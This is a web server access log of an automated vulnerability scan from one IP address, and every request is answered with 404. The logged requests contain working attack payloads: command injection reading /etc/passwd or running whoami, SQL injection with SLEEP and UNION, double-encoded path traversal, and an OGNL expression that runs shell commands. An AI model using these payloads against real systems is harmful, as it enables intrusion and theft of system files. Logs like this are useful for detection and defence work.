137.220.197.141 - - [21/Jan/2024:17:19:50 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:20:55 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:21:17 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:21:30 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:22:49 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:23:37 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:23:44 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:23:58 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:24:02 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:24:44 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:24:46 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:26:36 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:26:38 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:27:41 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:28:48 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:00 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:00 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:02 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:02 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:04 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:28 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:30 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:41 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:42 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:43 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:29:55 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:02 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:04 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:27 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:29 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:30 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:42 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:30:55 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:32:26 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:33:17 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:33:19 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:33:30 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:33:32 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:33:34 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:03 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:05 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:07 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:08 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:20 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:20 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:23 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:34 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:36 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:41 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:43 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:34:45 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:35:32 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:35:59 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:36:40 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:36:42 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:36:58 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:00 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:04 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:06 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:30 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:32 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:42 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:37:44 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:06 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:08 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:15 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:33 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:35 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:38 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:38:40 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:39:11 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:39:27 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:39:29 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:39:37 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:40:27 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:42:48 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:43:02 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:43:33 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:09 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:22 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:24 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:26 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:51 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:44:53 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:45:15 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:45:27 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:45:41 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:45:57 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:45:59 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:26 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:41 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:43 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:45 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:54 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:56 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:46:58 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:35 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:37 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:41 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:43 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:51 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:47:53 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:48:06 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:48:08 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:48:10 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:48:44 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:48:46 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:49:25 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:50:12 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:50:14 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:50:22 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:50:49 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:51:55 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:51:57 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:52:14 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:52:22 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:52:24 +0100] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:02 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:04 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:24 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:26 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:48 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:49 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:49 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:53:55 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:54:07 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:54:20 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:55:17 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:55:28 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:55:39 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:55:52 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:56:26 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:56:28 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:57:34 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:57:36 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:57:38 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:57:53 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:58:06 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:04 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%